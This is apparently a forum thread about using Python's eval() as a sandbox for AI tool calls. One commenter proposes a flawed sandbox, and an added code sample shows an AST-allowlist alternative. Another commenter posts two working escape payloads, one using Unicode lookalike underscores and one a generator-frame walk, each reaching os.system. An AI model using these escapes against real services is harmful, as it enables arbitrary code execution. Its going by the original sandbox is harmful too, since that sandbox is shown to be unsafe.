est 3 days ago

slightly related, if you need a safe python sandbox instead of eval(), you can try

eval(YOUR_CODE.replace('__', ''), {'__builtins__': None}, {})

I saw this trick on reddit many years ago and wrote a blog last month https://blog.est.im/2026/stdout-09

I wasn't able to crack this sandbox, and neither could opus-4.6-thinking.

This sandbox won't protect you from DoS, but I think it's reasonably safe to use it for AI tool calls. Just expose your MCP/RPC methods in the last {} and you are good.
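Added example, not code from the thread: instead of stripping `__` from the source string, this parses the expression with `ast` and rejects any node type outside a small allowlist before anything is evaluated, with the exposed tools passed in the locals dict as est suggests. `safe_call`, `is_rejected` and `TOOLS` are names chosen here.

```python
import ast

# Node types a tool-call expression legitimately needs: literals, containers,
# names bound to exposed tools, and calls with positional/keyword arguments.
ALLOWED_NODES = (
    ast.Expression, ast.Call, ast.Name, ast.Load, ast.Constant, ast.keyword,
    ast.List, ast.Tuple, ast.Dict, ast.UnaryOp, ast.USub, ast.BinOp,
    ast.Add, ast.Sub, ast.Mult, ast.Div,
)


def safe_call(source: str, tools: dict):
    """Evaluate a tool-call expression against an allowlist of tools.

    Attribute access, subscripts, walrus assignments, comprehensions and
    lambdas are all outside ALLOWED_NODES, so they are rejected at the AST
    level before eval() runs. Because the check is structural rather than
    a string match, Unicode confusables in identifiers do not matter.
    """
    tree = ast.parse(source, mode="eval")
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            raise ValueError(f"disallowed syntax: {type(node).__name__}")
        if isinstance(node, ast.Name) and node.id not in tools:
            raise ValueError(f"unknown name: {node.id}")
    code = compile(tree, "<tool-call>", "eval")
    # Empty builtins dict (not None) so any stray lookup fails cleanly.
    return eval(code, {"__builtins__": {}}, dict(tools))


def is_rejected(source: str, tools: dict) -> bool:
    """True if safe_call refuses the expression (bad syntax or disallowed node)."""
    try:
        safe_call(source, tools)
    except (ValueError, SyntaxError):
        return True
    return False


# Constructed tool table standing in for the MCP/RPC methods you would expose.
TOOLS = {"add": lambda a, b: a + b, "echo": lambda s: s}
```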

farlow 3 days ago | parent [-]

You can bypass this with unicode:

eval('[c._﹍init﹍_._﹍globals﹍_["os"].system("id") for c in ()._﹍class﹍_._﹍bases﹍_[0]._﹍subclasses﹍_() if c._﹍init﹍_._﹍class﹍_._﹍name﹍_ == "function" and "os" in c._﹍init﹍_._﹍globals﹍_]'.replace('__', ''), {'__builtins__': None}, {})

farlow 3 days ago | parent [-]

You can do it without unicode, too:

eval("(L:=[None],g:=(x.gi_frame.f_back.f_back.f_builtins for x in L),L.clear(),L.append(g),bi:=g.send(None),bi['_'+'_import_'+'_']('os').system('id'))".replace('__', ''), {'__builtins__': None}, {})

est 3 days ago | parent [-]

damn you are good. Is this a new py3 thing?

I must have missed lots of CTF lessons.

How about adding another .replace('﹍','').replace('gi_frame', '') ?